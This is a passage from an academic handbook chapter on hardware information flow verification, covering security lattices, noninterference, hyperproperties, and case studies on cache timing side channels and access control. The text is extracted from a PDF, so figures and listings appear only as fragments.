of the system. One can also view this same lattice through the lens of confidentiality
(Fig. 1c) where secret information should never be leaked to an unclassified or
openly viewable storage object.
Lattices can also be more complex. Figure 1d shows a lattice with eight different
security classes: {A, B, C}, {A, B}, {A, C}, {B, C}, {A}, {B}, {C}, and ∅. The
flow relation defines how information from three different categories, A, B, and
C, should be allowed to move throughout the system. A label of {A, B, C} indicates
that this storage object has information from all three categories, the label {A}
indicates the information only comes from A, the label {B, C} denotes the object
has information from both B and C, and so on. The flow relation depicted in this
lattice says that information from security class {A}, for example, is allowed to
flow to security class {A, B} and transitively to {A, B, C} but should never flow to
security class {B, C}. Lattices can be arbitrarily complex, although in practice the
vast majority of IFT tools defaults to a two-label lattice as shown in Fig. 1a, b, and c.
a) b) c) d) A, B, C
H untrusted secret
A, B A, C B, C
A B C
L trusted
Ø
Fig. 1 A security lattice defines the flow relationships → between the different labels of a security
class SC . Part (a) defines a simple two-label {H, L} security class with allowable flow from low
L to high H . This same lattice can be used to define integrity (part b) and confidentiality (part c)
properties. More complex lattices are possible, e.g., part (d) shows a more complicated lattice that
uses 8 different labels to indicate the mixing of information between three entities A, B, and C.
Most hardware security IFT tools use a simple two-label lattice like those in parts (a), (b), and (c)
39 Information Flow Verification 1393
A key idea of information flow tracking is that storage objects have a security
class label in addition to their functional value. The label acts as an additional
piece of metadata that IFT verification tools use to determine properties related
to confidentiality, integrity, and availability.
IFT tools aim to provide some notion of tracking noninterference – an informa-
tion flow model with a strict flow relation (→) proposed by Goguen and Meseguer
(1982). In the noninterference model of information flow, any changes in high inputs
shall never be reflected in the low outputs. That is, low objects can learn nothing
about high information. Another way to think about this is that a noninterfering
computer system should produce the same low outputs for any set of low inputs
regardless of the functional values of the high inputs, i.e., it is impossible to learn
any information about the high values by controlling the low inputs and viewing
the low outputs. Equivalently, the computer system, projected on to a “low view,”
responds exactly the same to any input sequence of low values regardless of the high
values.
IFT determines how the labels propagate throughout the system by analyzing
the system behavior and updating the labels corresponding to the storage objects.
The IFT tool is given an initial labeling for the storage objects. Setting these initial
labels determines which objects are considered high and which are considered low
and therefore where information should and should not be allowed to flow. The
rules for determining how an object’s security class is updated are defined by the
class combining operator ⊕.
IFT tools implement the class combining operators ⊕ to track information flows
in different ways. The simplest and most conservative approach only considers the
labels and marks the output of any process P as H when at least one of its inputs
is H . In other words, the output of the process is labeled L only when all of the
inputs to the process have an L label. In this case, the class combining operator is an
OR gate. (This logic assumes that the label H = 1 and L = 0.) This is a safe
approach but can lead to false positives where data is labeled as H when it should
be L, i.e., the IFT tool states there is a flow when one does not exist.
The simple OR class combining operator is often too conservative and imprecise.
It can quickly lead to many storage objects being marked as H even if they
have no H information. To better understand the source of this imprecision,
consider a process that implements a binary two-input Boolean AND operation
as shown in Fig. 2. The inputs and outputs have their typical functional values
(0 or 1). Additionally, each input/output has an associated label (H or L). The class
combining operator is responsible for generating the output label. Part (a) shows the
case when both inputs have an L label. The output label will be L regardless of the
input’s functional value. Part (b) illustrates a similar situation when the inputs all
have an H label; the output will have an H label. More generally, if all inputs are
H (L), the outputs will be H (L), respectively. The operator becomes more complex
when one of the inputs is marked as H and the other input is L. Part (c) shows a
case when one of the inputs is labeled L and has a functional value of 1. The other
input has an H label. The results of the AND operation will be equal to the value of
H ’s functional value. Thus, there is information about H in the output – changing
1394 C. Sturton and R. Kastner
a) c)
{*, L} {1, L}
{*, L} {0/1, H}
{*, L} {0/1, H}
b) d)
{*, H} {0, L}
{*, H} {0, L}
{*, H} {*, H}
Fig. 2 A simple process implementing a binary two-input Boolean AND operation. The two
inputs have the functional values (0/1) and the corresponding security class labels (H /L). The
output label is determined by the class combining operator. Part (a) shows an example when both
inputs have an L label. The output should be labeled at L regardless of the functional values of
the inputs (denoted as *). Part (b) is similar where both inputs are H and the output label should
be marked as H . Parts (c) and (d) show more complex examples when the input labels are mixed.
Here the output labels depend on the functional values of the inputs. Part (d) shows the specific
scenario when an output can be labeled L even if one of the inputs has an H label
H will result in a direct interference of the output of the AND operation. Thus, the
output should be labeled H . Part (d) changes the functional value of the L input to
0. In this scenario, the output is always 0 regardless of the functional value of the H
input. That is, no information related to the H input propagates to the output; thus
the output can safely be labeled as L. Yet, the conservative approach would mark
the output as H , i.e., stating that there is a flow from H to L when there is not. More
complex combining operators consider the functional behavior of the process, the
functional values of the inputs to that process, and their labels.
There are IFT models covering different types of flows – explicit and
implicit (Denning and Denning 1977), timing (Oberg et al. 2014), and
power (Nahiyan et al. 2020). This article focuses on explicit, implicit, and timing
flows, which relate to the security properties that are more commonly verified in
practice. The models differ on their security classes, class combining operator,
and flow relations. Most of the variation is due to the class combining operator,
e.g., determining explicit flows is generally much easier than determining implicit
flows, which is generally easier than modeling timing flows. The basic ideas behind
these different flows are described in the following. A hardware security verification
engineer does not necessarily need to comprehend all the details how these flows are
modeled – that is the job of the IFT tool – but they do require a basic understanding
about the types of flows as those are important when specifying the information
flow properties.
Figure 3 shows a simple example that illustrates the difference between explicit
flows and implicit flows. The figure depicts a multiplexor as a process that has three
inputs A, B, and S and one output O. Each input and output are associated with
a storage object, e.g., a register/flip-flop. Explicit flows occur between the inputs
39 Information Flow Verification 1395
A
O Explicit Flows
Implicit Flows
B
S
Fig. 3 A multiplexor exhibits explicit information flows between inputs A and B and the output
O. There is an implicit flow between the selector input S and the output O
A and B and the output O. In this case, the values from A or B are directly copied
into O. This means that O contains exact information about A and B, and thus O
should take on the label of the input that is copied. The input S is the select bit
which determines which of A or B to copy to the output O. There is an implicit
flow between S and O due to the fact that an attacker would be able to determine
information about the functional value of S by observing the functional values of O.
Implicit information flows are more subtle but are still capable of being exploited.
A timing flow is a scenario where information is transferred based upon the time
that a process take to compute an output. A common timing flow occurs with caches.
An attacker will request some data from the cache. The data is returned quickly if it
is stored in the cache. When the data is not in the cache, it takes a longer amount of
time to fetch it from memory. The actual value of the data in both cases is the same,
but the time at which it is delivered is different. Thus, if that presence/absence of
that data in the cache was affected by another H process, e.g., the H process loads
data that evicts some other data, then the attacker can ascertain H information. This
is the core idea between Spectre (Kocher et al. 2019), Meltdown (Lipp et al. 2018),
Foreshadow (Van Bulck et al. 2018) and other attacks that use the timing of cache
operations to extract secret information.
Information flow properties are specified by setting storage object labels and
determining how those labels can and cannot flow throughout the system. Hardware
security verification starts by developing a threat model and determining the security
assets to protect (Aftabjahani et al. 2021). Assets are important system information
whose behaviors should be monitored. A cryptographic key is a prime example of a
security asset; a security verification engineer would want to understand how, when,
and where information related to the key can move throughout the system. This
is an example of a confidentiality property. Other examples of assets are control
registers. Control registers often dictate important security scenarios. For example, a
control register would be set in order to move the system into secure operating mode.
Another control register would be set to indicate debug mode. Understanding who
can set these control registers and the conditions under which they can be changed
is important for the secure operation of the system. In this integrity scenario, one
1396 C. Sturton and R. Kastner
would want to understand when the trusted registers could be influenced by some
untrusted storage object.
To better understand how to use IFT for hardware security verification, consider
the control/status register (CSR) associated with setting secure operating mode (e.g.,
the Secure Configuration Register from TrustZone). This register stores important
information related to operating in a secure mode and is used to move into and out of
secure operating mode. Thus, it is important to protect the integrity of this register. In
this scenario one would mark common registers and memory space corresponding
to the nonsecure world as untrusted and the CSR as trusted. One would want to
determine if it is possible for the CSR label to ever become untrusted and, if it is, to
understand the scenarios in which this can occur. IFT verification tools provide this
ability.
IFT can also be used to understand security properties related to confidentiality.
Consider the case where one aims to understand the confidentiality of a crypto-
graphic key. IFT enables reasoning about how the value of a cryptographic key can
flow throughout a computer system. In this scenario, assume the key is stored in
a memory-mapped register associated with the custom IP core that performs the
cryptographic operations. The system would be initially labeled in the following
manner: the register that holds the key is labeled secret, and everything else in
the system is labeled unclassified. IFT tools can help determine which parts of the
system can learn information about the key. For example, can information related to
the key ever flow to the cache? IFT verification would taint the key and attempt to
ascertain the conditions under which a storage object related to the cache becomes
labeled as secret, i.e., information related to the key has been leaked into the cache.
Additionally, verification engineers often wish to make strict “no flow” conditions.
For example, no information related to the key should ever leak into user space.
Here one would taint the key and use IFT to see if the physical memory locations
corresponding to the user space can ever be marked as secret. If they are, then there
is some information about the key in those tainted memory locations.
More generally speaking, labels are assigned depending on the security proper-
ties under verification. The labels can be broadly interpreted to define properties
related to confidentiality, integrity, and availability. At their most abstract, labels are
defined by the security classes. The rules for calculating the labels are defined by
the class combining operator. When combined with the flow relations, these define
the types of security properties that IFT can verify.
a b c
key
rdy
data
AES ciphr rst → ¬rdy
rst
Fig. 4 A trace of execution can be used to confirm a simple assertion. (a) A simple AES module
with inputs key, data, and rst and output rdy. (b) An assertion to capture correct reset
behavior. (c) A trace of execution demonstrate the desired behavior
read. The ciphertext output is never valid while the module is undergoing a reset
cycle, and the ready signal should reflect this. To test that the behavior of the ready
signal is correct in this regard, one might write the simple assertion, rst → ¬rdy
(Fig. 4b). Either traces of execution or a formal model of the design can then be
studied to see whether it is indeed the case that the ready signal is never high during
a reset cycle (Fig. 4c). Any trace-based verification technique can be used to either
find violations of this property or determine that the behavior of rdy is likely correct
because no violations are found (Because exhaustive state coverage is not feasible,
a trace-based technique will not prove correctness with respect to a property for any
but the simplest of designs. The most such a technique can verify is that no violations
were found.). Alternatively, a formal verification technique such as model checking
can be used to either find violations of the property or determine that no violations
can occur within the first N number of clock cycles of execution (The bound N is
an adjustable parameter to the verification tool.).
Another desirable property of the module is that information about the key should
not flow to the ready signal. It should be impossible to recover even one bit of
the key signal by studying the on-off behavior of the rdy signal. A variation in
time to compute can reveal information about the value of key when that variation
depends on the value of key. The behavior of rdy will reflect any such variation
and therefore will reveal information about the key. When that happens, the rdy
signal is said to leak information about key.
However, this property cannot be stated as a simple assertion in propositional
logic. Let’s say one wants to ensure that the value of the 0th bit of the key signal can
never flow to the rdy signal. Two naively written properties might be key0 → rdy
or key0 → ¬rdy. However, neither one expresses the desired property, and in
fact, both reflect acceptable behaviors of the design. It might be tempting to think
that adding temporal logic to the property will solve the problem. For example, a
property along the lines of key0 → X(rdy), which says that if the 0th bit of key
is set then in the next (X) clock cycle rdy must also be set, seems to solve one
problem with the naive properties, which is that information will surely take time
to flow through a design. But, it does not solve the deeper problem, which is that
there is no combination of values of key0 and rdy that is illegal. Rather, it is that
the value of rdy in a particular clock cycle should be the same whether key is set
or unset; the value of rdy should not depend on the value of key0 . But, in order
1398 C. Sturton and R. Kastner
to get at this property, it is not enough to reason about a single trace of execution.
One needs to reason about traces in which key0 is set and traces in which key0
is unset. The property that is wanted is as follows: in all possible traces, whenever
all of the inputs other than key0 are fixed, the behavior of rdy will be fixed. In
other words, if data, rst, and key1 . . . keyn−1 are fixed to particular values,
the waveform of rdy will not vary, regardless of how key0 varies. This defines
noninterference between key0 and rdy – nothing about the value of key0 can be
learned by observing rdy.
First-order logic (often abbreviated FOL) can be used to express the desired
property that information should not flow from any of the bits of key. First-
order logic is more expressive than propositional logic and allows one to state a
notion of for all traces. First-order logic also allows one to introduce a notion of
equality between two registers. The desired property, formally written, might look
like this:
This property says that for any two traces produced by the AES module
(∀ AES1 , AES2 ), as long as rst has the same value in both traces and data has the
same value in both traces, rdy will also have the same value in both traces (Note
that one would probably like a stronger property saying that as long as rst carries
the same value in both traces, regardless of both data and key, rdy will carry
the same value in both traces.). The value of key does not affect the value of rdy.
In other words, information does not flow from key to rdy. For simplicity, timing
information has been elided; the true property would assert that the two rdy signals
always have the same value at all points in the trace.
The key idea that makes the above property sound is that it reasons about any
two possible traces. It is impossible to find two traces of the system in which rst
and data are held fixed and the behavior of rdy varies.
The example property about how information flows, written formally in Eq. (1),
is fundamentally different than the example assertion about how signals behave,
shown in Fig. 4b. The latter is an example of a trace property. It is a property that can
be exhibited by a single trace of execution and can similarly be falsified by a single
trace of execution. The types of properties that are expressible as SystemVerilog
Assertions (SVA) are all trace properties. One usually thinks of these properties in
terms of their logic formulation (e.g., rst → ¬rdy), but another way to think
about them is as a set of execution traces: for example, the set of all traces in which
the statement rst → ¬rdy is valid. Using this definition in which a property is
a set of traces, the property is true of a system if all of the traces the system could
possibly produce are in the property’s trace set.
39 Information Flow Verification 1399
The properties about how information flows, on the other hand, are not trace
properties but rather hyperproperties (Clarkson and Schneider 2010). These
properties are described by sets of traces, rather than by individual traces. Similarly,
no single trace of execution can demonstrate a violation of a hyperproperty; only
a set of two or more traces can do that. If a trace property is defined as a set of
traces, then a hyperproperty is defined as a set of sets of traces, and every set
of traces within the set represents a possible system satisfying the hyperproperty.
Conversely, a hyperproperty is true of a system if all of the traces the system could
possibly produce form one of the sets in the set of sets of traces that defines the
hyperproperty. Hyperproperties can express notions of information flow. The AES
hyperproperty is one example. Noninterference, described in section “Information
Flow Model”, is another example, and determinism, which says that only the defined
inputs can affect the output (Roscoe 1995), is another. All of these information flow
hyperproperties are important for security. Hyperproperties can also express notions
of fairness, such as whether a coin flip has a non-biased outcome. However, this
chapter focuses on properties related to information flow.
Going forward, the term property will be used in a generic sense to mean the
behavior of the system. Where the distinction is important and not clear from the
context, the terms trace property and hyperproperty will be used.
Verifying Hyperproperties
A strong security verification effort will require verifying information flow proper-
ties – hyperproperties – of a design. However, because a hyperproperty is neither
satisfied nor falsified by any single trace of execution, the traditional verification
efforts will not work. It is not possible to express hyperproperties in standard
assertion specification languages such as SVA. But, even if it were possible – if the
specification language was updated to include the for all quantifiers, for example –
the traditional verification approaches would not be able to determine whether such
a hyperproperty is valid of the design or not. Trace-based engines monitor the
signals of the design as simulation progresses and look for any violation of the given
assertion. The engine does not have knowledge of any prior or future simulation runs
and therefore cannot reason about the comparative behavior of two or more traces
of execution. Similarly, traditional model checking engines analyze the behavior of
a single instance of the design and therefore cannot reason about the comparative
behavior of two or more instances.
There are, however, new options for verifying information flow properties,
and they can be categorized by whether they use a static or dynamic analysis
technique. Under the static analysis category are cone-of-influence analysis and a
more sophisticated model checking technique (section “Static Analysis”). Under
the dynamic analysis category is information flow tracking (section “Dynamic
Analysis”). Each of these are discussed in the following.
1400 C. Sturton and R. Kastner
Static Analysis
In static analysis the RTL description of the design is itself analyzed. The analysis
tool takes as input the RTL design, but rather than try to simulate the design, the
analysis tool parses the design to answer a particular question.
Cone-of-influence analysis. The simplest form of static analysis that can be used
to verify information flow properties is a cone-of-influence analysis. This analysis
finds every signal in the design that can possibly affect the behavior of a signal or
set of signals, and it is often used in the course of classical traditional verification to
simplify the verification problem. COI analysis can be used to provide some insight
into how information flows as follows. Suppose there is a design D with output
signal snk (for “sink”), and the verification goal is to identify which information
flows to this sink signal. First, a COI set is initialized to include the signal snk.
The analysis then identifies every signal s which appears on the right-hand side of
an assignment to snk in the RTL description of design D. Every newly identified
s is added to the COI set. The analysis then repeats, for every s newly added to the
COI set; every signal t which appears on the right-hand side of an assignment to s is
added to the COI set. The analysis continues to repeat until a steady state is reached
in which no new signals are added to the COI set. (As there are a finite number of
signals in the design, the analysis is guaranteed to terminate.)
Every signal in the COI set has the potential to be a source of information flow
to snk. This analysis is fast, requiring at most N iterations for a design with N
unique signals, and the resulting COI set is complete: every signal which acts as a
source of information flow to snk will be included in the COI set, or put another
way, any signal that is not included in the COI set definitely does not influence the
behavior of snk. However, the analysis is not sound: there may be signals included
in the COI set which can never be a source of information flow to snk. Furthermore,
the analysis provides a picture of how information flows in only broad strokes and
details about the path that information takes through the design or the conditions
under which flows occur are not possible with this analysis.
To better understand the limitations of COI analysis, consider Fig. 5. In Fig. 5a,
an OR gate tied to 1 is connected to an AND gate. It is clear that while information
from B and C both flow to, and affect the behavior of, output O, no information is
flowing from A to O since the value of B is determined solely by the fixed input.
However, a COI analysis will not capture that fact and will include A in the COI
set of O. Figure 5b illustrates how details about which path information takes will
be lost by COI analysis. In the top circuit of Fig. 5b, information flowing from B
to O always passes through the XOR gate, while in the bottom circuit, information
can flow directly from B to O. COI analysis cannot make that distinction, and the
distinction is important for security. Suppose A is a one-bit secret key and B is a
one-bit message that should be kept private. If the key is generated at random and
without bias and is unknown to the observer at O, then the observer cannot learn
any information about the message B even though there is information flowing from
B to O: XORing the private message with the secret key obscures the information in
39 Information Flow Verification 1401
a b c
Fig. 5 A trace of execution can be used to confirm a simple assertion. (a) COI analysis would
determine that information can flow from A, B, and C to O. However, there is no possible
information flow from A to O. (b) In the top circuit, all information flowing from B to O always
passes through the XOR gate, whereas in the bottom gate information can flow directly from B to
O. COI analysis cannot differentiate between these two flows. (c) COI analysis would determine
that information can flow from A, B, and S to O but would not determine the conditional nature of
the flows from A or B to O
the message. However, in the bottom circuit, the observer at O will be able to learn
information about B, for example, whenever the output at O is 1, the observer knows
that the message is also 1. These two circuits have wildly different security postures,
and in both cases, the analysis of information flow is important, but a COI analysis
cannot provide the needed information. Finally, Fig. 5c illustrates a circuit with a
conditional flow: depending on the value of S, information will flow either from
A or B to O. (Information always flows from S to O.) However, the COI analysis
will put both A and B in the COI set and has no way to make note of the conditional
nature of the flow.
which the design is unrolled so that a new logical formula representing the design is
created for each clock cycle represented (Biere et al. 2003); IC3 or property-directed
reachability, which does not require unrolling a design but instead reasons about the
reachability of a “bad” state from a given state (Bradley 2011; Een et al. 2011); and
engines based on binary decision diagrams (BDDs) which are used to efficiently
represent sets of states and their transitions. The chapter on bit-level model checking
describes the various techniques for sequential model checking in detail.
An out-of-the-box use of model checking in commercial verification engines can-
not verify hyperproperties, which includes information flow properties. However,
by carefully setting up the problem statement, model checking can be used to verify
some types of hyperproperties called k-safety properties. Information flow proper-
ties are k-safety properties, and in particular, they are two-safety properties. The way
to use model checking to verify two-safety properties is to use self-composition, a
technique in which two identical instances of a design are combined in parallel to
make one large design, which is then fed to the model checker (Terauchi and Aiken
2005). Going back to the AES example from earlier, two instances of the design, say
AES1 and AES2 , are combined to create AES. The model checker can then verify
the property rst1 = rst2 ∧ data1 = data2 → rdy1 = rdy2 of this combined
design. Model checking is expensive, the size and complexity of the satisfiability
queries grow quickly, and requiring two instances of a design doubles the starting
complexity. For this reason, model checking information flow properties is limited
to relatively small designs or to individual components of a design.
Dynamic Analysis
In dynamic analysis, it is the behavior of the design as it is simulated (or executed)
that is analyzed. The analysis tool can be external to the design, in which case the
tool can monitor only the input and output behaviors of the design. If, however,
the behavior of internal signals needs to be analyzed, then the design itself must
first be instrumented – modified in such a way that the logic needed for analysis is
incorporated into the design itself.
Trace-based analysis methods do not apply to information flow properties, and
dynamic analysis is a trace-based method: the behavior of a trace of execution is
observed and analyzed by the tool. However, by using information flow tracking,
dynamic analysis can be made applicable to the study of information flow proper-
ties (Tiwari et al. 2009). The design is instrumented to track how a particular input
signal is affecting every other signal in the design. At the end of any single trace of
execution, the added tracking logic has captured how information has flown from
the input signal of interest.
To understand how this works, consider the simple AND gate in Fig. 6. In this
example information flow tracking is used to expose how and when information
from signal B can flow to output O. The original AND gate is on top, and the
added tracking logic, in this case a second AND gate, is on the bottom. The new
signals BT and OT track the information as it flows through the circuit. Going back
to the Denning model of information flow, BT , OT , and the second AND gate are
implementing the class combining operator ⊕ of the underlying model. Information
39 Information Flow Verification 1403
Verification Tools
Simulation-Based Verification
met. The designer must provide a testbench that sufficiently exercises the design to
find possible property violations. Simulation-based verification tools cannot prove
the correctness of a design; if no property violation is found, it is possible that the
testbench was insufficiently complete. On the other hand, if a property violation
is found, the root-cause analysis is simplified as the testbench provides the exact
sequence of inputs that caused the property violation.
One commercial tool using information flow tracking is Radix-S from Tortuga
Logic (Radix-S). The technology behind Tortuga Logic was first developed in
academic research (for a survey, see Hu et al. 2021). Academic research has
also demonstrated the use of information flow tracking to find timing channels in
addition to data channels (Ardeshiricham et al. 2017).
The state of the art in formal verification of information flow properties uses a form
of equivalence checking. The idea is similar in spirit to the use of self-composition
with model checking described above and can be used to demonstrate determinism.
The goal is to verify that a given destination signal is determined only by the
known, allowed source signals. In other words, there is no additional, illegal flow of
information from a given source signal to a given destination signal. In equivalence
checking, two versions of a design are proven to exhibit the same behavior given
the same environment and inputs. To verify determinism, two copies of a design are
created, and in both, the known sources of information are constrained to be equal.
Sequential equivalence checking is done to verify that the destination signal in both
copies will be equal. If it is possible for the two copies to diverge, then there exists
some additional path of information flow to the destination.
A benefit to formal verification methods is that the result is not dependent on
testbench coverage. If a violation is not found, then a violation does not exist.
However, in order to handle large-scale designs, engineers often have to introduce
suitable abstractions, and finding the right abstraction can be challenging. In
addition, if a violation is found, performing the root-cause analysis can be difficult.
Commercial tools that perform formal verification of information flow proper-
ties include JasperGold from Cadence (JasperGold), Questa Secure Check from
Siemens (Questa Secure Check), and Formal Security Verification from Synop-
sys (VC Formal).
Case Studies
This section presents two case studies for performing security verification of a
hardware architecture description. The first case study performs security verification
of a cache specifically targeting timing side channels. The second case study verifies
memory access control systems – an important aspect of modern secure computing
systems. In each case, the threat model is described, the assets are defined, and
example security properties are presented.
39 Information Flow Verification 1405
Caches are crucial for high-performance computer architectures and present in all
but the simplest microprocessors. Caches take advantage of spatial and temporal
dependencies in data access patterns. When the processor makes a memory
transaction, it assumes that data and its neighboring values will likely be accessed
again in the near future and thus keeps them in the faster, smaller cache memory.
When a processor requests data that was already loaded into the cache, it is returned
quickly (typically within a few cycles). When that data is not in the cache, the
cache itself must request it from another slower but larger memory (which typically
takes tens of cycles) during which time the cache stalls. The variation in the time
of retrieving data results in a timing side channel (Percival 2005). This case study
describes how to verify the existence of potential information leakage via a cache
timing side channel. This leakage is powerful and a key element of Spectre (Kocher
et al. 2019), Meltdown (Lipp et al. 2018), Foreshadow (Van Bulck et al. 2018), and
other architectural security attacks.
Figure 7 shows a diagram of a cache. The cache sits between a processor (left
interface) and another memory (right interface). The cache stores a number of cache
data lines each with metadata that includes their valid v bit, its corresponding
memory tag, and its associated processor ID pid. The PID is used to differen-
tiate between users, secure/insecure mode, etc. The Processor Transceive
Logic takes as input write data wr, a read/write address addr, write (wr_req)
and read request (rd_req) signals, and a process ID pid. The outputs are the
processor’s requested read data rd and the stall signal indicating whether the
cache is waiting for data. The Memory Transcieve Logic interfaces with
another larger and slower memory, e.g., a lower-level cache or off-chip DRAM.
This interface has an address addr and rd and wr busses that transfer cache
lines between the cache and the memory. The terminology processor.rd and
memory.rd are used when needed to disambiguate any unclear signal references.
Standard Cache
addr
wr_req rd
Processor Memory
rd_req wr
Processor Transcieve Transcieve Memory
pid Logic Logic addr
stall
rd
Fig. 7 The case study aims to understand potential threats related to a cache timing side channel
attack. The security verification focuses whether information can leak from a sensitive process
(PID i) to another untrusted process (PID j ) via the timing behavior of a cache. IFT can determine
such complex interactions
1406 C. Sturton and R. Kastner
Assume that a threat model views a cache side channel as a security vulnerability.
Thus, the security verification process aims to understand whether the cache is
susceptible to an attack. The first responsibility is to identify the assets – what
information needs protection, when is this information exposed to the cache, and
where should it not flow? Specifying this in a manner that the IFT tool can
understand involves interfacing with the security class labels. Digging further into
the example will provide details on how and when to set and check the labels to
verify a cache timing side channel.
Assume that the threat model requires that there is no timing side channel
between PID i and PID j . Further, assume that PIDs are securely provided via the
pid signal during processor read/write requests. One important cache side channel
involves the leakage of information related to the memory accesses performed by
some sensitive computation, in this case any computation performed by PID i.
Thus, it is determined that processor.addr is an important asset that contains
information that should not be leaked. processor.addr does not always carry
information related to PID i; its label should only be marked high (H ) when PID i
is using the cache. Thus, the addr_proc label is set to H only if pid == i. The
goal is to check when any sensitive address information about PID i flows from the
cache to the processor while PID j is executing. processor.rd is one important
signal where this information could flow. Thus, the analysis should assert that the
processor.rd label is always L and report scenarios when it could become H
as those are the conditions when information leakage about PID i’s memory access
pattern flows to PID j through a cache timing side channel. Finally, all storage
objects (registers, Verilog variables, etc.) outside of the addr_proc signals should
be initially marked as L.
IFT tools provide the capability to track different types of flows. In this case, the
goal is to investigate timing flows, and thus, analysis requires an IFT tool that can
track timing flows. Functional flows and timing flows differ in how the information
is being transferred. Functional flows transfer information directly through the
functional values of the storage object. Explicit flows are an example of a functional
flow. Timing flows manifest themselves via the time at which the result is delivered.
In this cache timing side channel example, the goal is to know if the timing
behavior of the cache provides any information to PID j about how PID i previously
used the cache. A common timing flow manifests itself via the processor.rd
signal, specifically the time at which valid data is presented on that signal. Note
that there may be a timing flow without a functional flow since the value of the
processor.rd will not vary (only the time at which that same value is delivered).
These ideas are formalized by Oberg et al. (2014).
An IFT tool that tracks both functional flows and timing flows, e.g., Clepsy-
dra (Ardeshiricham et al. 2017), will provide separate labels and check the status of
the functional (f ) and timing labels (t). The notation used here appends the labels to
storage objects. For example, processor.addr.f and processor.addr.t
indicate the functional flow label and timing flow label (respectively) for storage
object processor.addr. Functional flows and timing flows are not independent.
A functional flow is transferred to a timing flow in the case(s) when that functional
39 Information Flow Verification 1407
value is assigned conditionally. This causes a variation in the time at which that
functional value is set, i.e., there is a timing flow.
Going back to the case study, the goal is to understand if the functional values
processor.addr ever leak via a timing channel. Thus, the analysis requires
setting processor.addr.f = H when PID i is using the cache and checking
whether the H label can ever flow to processor.rd.t (the timing label of the
read data) when pid == j.
Listing 1 provides an assertion-based IFT property for determining if a cache
exhibits a timing side channel via its access patterns. The assertions work directly
on the labels and use a labeling system similar to Clepsydra (Ardeshiricham et al.
2017) for verifying functional and timing flows. The default functional f and timing
t labels are set to L. The processor.addr.f functional label is set to H
when PID i is using the cache, indicating that this information will be tracked.
The analysis must then determine if any information about how PID i used the
cache is leaked to processor.rd via a timing channel. This is reflected in the
processor.rd.t value. If it is H , that indicates that processor.rd contains
some information about processor.addr via a timing channel.
Listing 1 Assertion-based property covering cache timing side channel from Fig. 7
All IFT tools provides a manner for setting and checking the IFT labels. That may
be done directly, as shown above, or it could be through some higher-level property
specification. One common IFT property language feature is the “no flow” operator
=/=> which indicates that information from a source storage object should not flow
to a sink storage object, i.e., source =/=> sink. This is equivalent to setting
the source label H and verifying that sink label stays L.
In addition to the =/=> operator, IFT tools often have a way to specify the
conditions under which information should be tracked (i.e., when to set the source
label) and conditions under which flows are allowable (i.e., when to check if the
sink label is H ). Listing 2 provides cache side channel property using the no-flow
operator:
Listing 2 No-flow property covering cache timing side channel from Fig. 7
Regardless of how the property is specified, a standard cache without any timing
side channel mitigation should fail security verification related to a timing channel.
That is, the verification process will find at least one scenario when information
about PID i memory accesses are leaked to PID j via a timing channel on the
processor.rd object. Without any mitigation in place, that scenario would occur
when PID j accesses a cache line that was previously accessed by PID i.
CPU Core
M
Interrupt
Trusted
Entity Configurable Access
S
Control Manager
S
Memory-Addressable
Resources
Fig. 8 The access control wrapper inspects memory requests from the CPU core and relays them
to the memory interconnect only if they adhere to the policy set in the configurable access control
manager, which is programmed by a trusted entity. Any illegal accesses are stopped at the source
and the trusted entity is alerted via an interrupt
Listing 3 A trace property that states the AXI manager M address write channel is properly
disabled during an interrupt
Listing 4 An information flow property that states that information from the CPU core manager
M interface should never flow outside of the access control wrapper when that information
corresponds to an illegal request
Researchers have defined over 300 properties related to basic security behaviors
of the access control wrapper; those properties along with the hardware description
of the access control wrapper are available in the Aker open-source repository (Aker
Github Repository). These properties were inspired by MITRE Common Weakness
Enumerations (CWEs) (The Common Weakness Enumeration Official Webpage
2022) specifically those related to hardware design and include a mix of trace
properties and hyperproperties.
Property generation was far and away the most challenging, time-consuming, yet
important part of the security validation process. Automating property generation is
invaluable in making security validation faster and more comprehensive, and new
research has begun to do just that (Deutschbein et al. 2021, 2022; Zhang et al.
2017). Potentially even more valuable is providing the engineer with insights into
the design under validation, which could lead to the specification of additional
properties and the discovery of new weaknesses and vulnerabilities.
Conclusion
References
Aftabjahani S, Kastner R, Tehranipoor M, Farahmandi F, Oberg J, Nordstrom A, Fern N, Althoff
A (2021) Special session: Cad for hardware security-automation is key to adoption of solutions.
In: 2021 IEEE 39th VLSI Test Symposium (VTS). IEEE, pp 1–10
Aker Github Repository. https://github.com/KastnerRG/AKER-Access-Control
39 Information Flow Verification 1411
Roscoe A (1995) CSP and determinism in security modelling. In: Proceedings 1995 IEEE
Symposium on Security and Privacy, pp 114–127
Sabelfeld A, Myers AC (2003) Language-based information-flow security. IEEE J Sel Areas
Commun 21(1):5–19
Terauchi T, Aiken A (2005) Secure information flow as a safety problem. In: Proceedings
International Static Analysis Symposium. Springer, pp 352–367
The Common Weakness Enumeration Official Webpage (2022). MITRE, https://cwe.mitre.org/
Tiwari M, Wassel HM, Mazloom B, Mysore S, Chong FT, Sherwood T (2009) Complete informa-
tion flow tracking from the gates up. In: Proceedings of the 14th International Conference on
Architectural Support for Programming Languages and Operating Systems, pp 109–120
Van Bulck J, Minkin M, Weisse O, Genkin D, Kasikci B, Piessens F, Silberstein M, Wenisch TF,
Yarom Y, Strackx R (2018) Foreshadow: extracting the keys to the intel {SGX} kingdom with
transient out-of-order execution. In: 27th {USENIX} Security Symposium ({USENIX} Security
18), pp 991–1008
VC Formal. Synopsys. [Online]. Available: https://www.synopsys.com/verification/static-and-
formal-verification/vc-formal.html
Zeldovich N, Boyd-Wickizer S, Kohler E, Mazieres D (2011) Making information flow explicit in
histar. Commun ACM 54(11):93–101
Zhang R, Stanley N, Griggs C, Chi A, Sturton C (2017) Identifying security critical properties for
the dynamic verification of a processor. In: Proceedings of the 22nd International Conference on
Architectural Support for Programming Languages and Operating Systems (ASPLOS). ACM
Verification of Quantum Circuits
40
Robert Wille and Lukas Burgholzer
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1414
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1416
Quantum Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1416
Quantum Circuit Compilation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1418
